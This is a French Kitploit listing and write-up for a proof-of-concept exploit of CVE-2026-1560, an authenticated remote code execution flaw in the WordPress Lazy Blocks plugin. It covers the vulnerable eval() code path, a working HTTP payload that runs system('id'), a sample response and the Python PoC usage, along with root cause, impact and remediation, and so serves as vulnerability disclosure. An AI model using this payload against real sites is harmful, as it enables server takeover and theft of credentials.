Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — Exploit de preuve de concept pour CVE-2026-1560, une vulnérabilité d'exécution de code à distance authentifiée dans le plugin WordPress Lazy Blocks, permettant aux utilisateurs à faibles privilèges d'exécuter du code PHP arbitraire via l'API REST. | Kitploit
Outils/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

Exploit de preuve de concept pour CVE-2026-1560, une vulnérabilité d'exécution de code à distance authentifiée dans le plugin WordPress Lazy Blocks, permettant aux utilisateurs à faibles privilèges d'exécuter du code PHP arbitraire via l'API REST.

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1560 – Exécution de code à distance authentifiée dans Custom Block Builder – Lazy Blocks ≤ 4.2.0

Chercheur : ZeYrOXxx

Plugin : Custom Block Builder – Lazy Blocks

Versions affectées : ≤ 4.2.0

Sévérité : Élevée

CVSS : 8.8

Type de vulnérabilité : Exécution de code à distance authentifiée (RCE)

Vecteur d'attaque : API REST

Privilège requis : edit_posts (Contributeur+)


Références

  • Avis Wordfence : https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

Résumé exécutif

Une vulnérabilité de sécurité élevée a été identifiée dans le plugin WordPress Custom Block Builder – Lazy Blocks affectant les versions jusqu'à 4.2.0 inclus.
La vulnérabilité permet à des utilisateurs authentifiés disposant de privilèges faibles (rôle Contributeur) d'exécuter du code PHP arbitraire sur le serveur via un point de terminaison de l'API REST destiné à la fonctionnalité d'aperçu des blocs.

Ce problème brise complètement le modèle de privilèges de WordPress et peut conduire à une .

compromission totale du serveur

Point de terminaison vulnérable

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

Le point de terminaison est accessible à tout utilisateur authentifié disposant de la capacité edit_posts.


Détails techniques

Vérification des autorisations

La route REST est enregistrée avec un rappel d'autorisation faible :

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

Cela inclut les Contributeurs, qui ne devraient jamais être autorisés à exécuter du code PHP.


Chemin de code vulnérable

Contrôleur REST – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

Rendu des blocs – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

La fonction eval() exécute du code PHP contrôlé par l'attaquant sans assainissement ni validation.


Analyse de la cause racine

Lazy Blocks permet une logique de rendu PHP personnalisée pour les blocs.
Le point de terminaison d'aperçu de l'API REST accepte des définitions de blocs fournies par l'utilisateur et ne fait pas de distinction entre les blocs stockés de confiance et les blocs d'aperçu contrôlés par l'attaquant.

En injectant des attributs de blocs aplatis tels que :

  • code_output_method
  • code_editor_html

un attaquant peut atteindre le puits d'exécution php_eval() et exécuter du code PHP arbitraire.


Preuve de concept (HTTP)

Requête :

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

Réponse :

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ Exécution de commande arbitraire confirmée


Cette PoC est fournie strictement à des fins de tests de sécurité et de recherche.


Impact

Un attaquant disposant d'un accès Contributeur peut :

  • Exécuter des commandes système arbitraires
  • Lire des fichiers sensibles (par exemple, wp-config.php)
  • Modifier les fichiers sources PHP
  • Élever ses privilèges jusqu'à administrateur
  • Compromettre entièrement l'instance WordPress

Remédiation

  • Restreindre le rendu PHP aux administrateurs uniquement
  • Supprimer l'utilisation de eval() sur les entrées contrôlées par l'utilisateur
  • Empêcher l'aperçu REST des blocs contenant du code PHP
  • Exiger la capacité manage_options ou unfiltered_html
  • Remplacer l'exécution PHP par des mécanismes de templating sûrs

Utilisation (PoC Python)

Prérequis

  • Python 3.x
  • Bibliothèque requests
  • Identifiants WordPress valides avec la capacité edit_posts (Contributeur+)

Installer la dépendance

root@kitploit:~
pip install requests

Exécuter l'exploit

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

Exemple

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

Si la cible est vulnérable, la sortie de la commande sera renvoyée dans la réponse HTTP.

⚠️ Cette preuve de concept est destinée strictement à des tests de sécurité et à des recherches autorisés.

Télécharger l’outil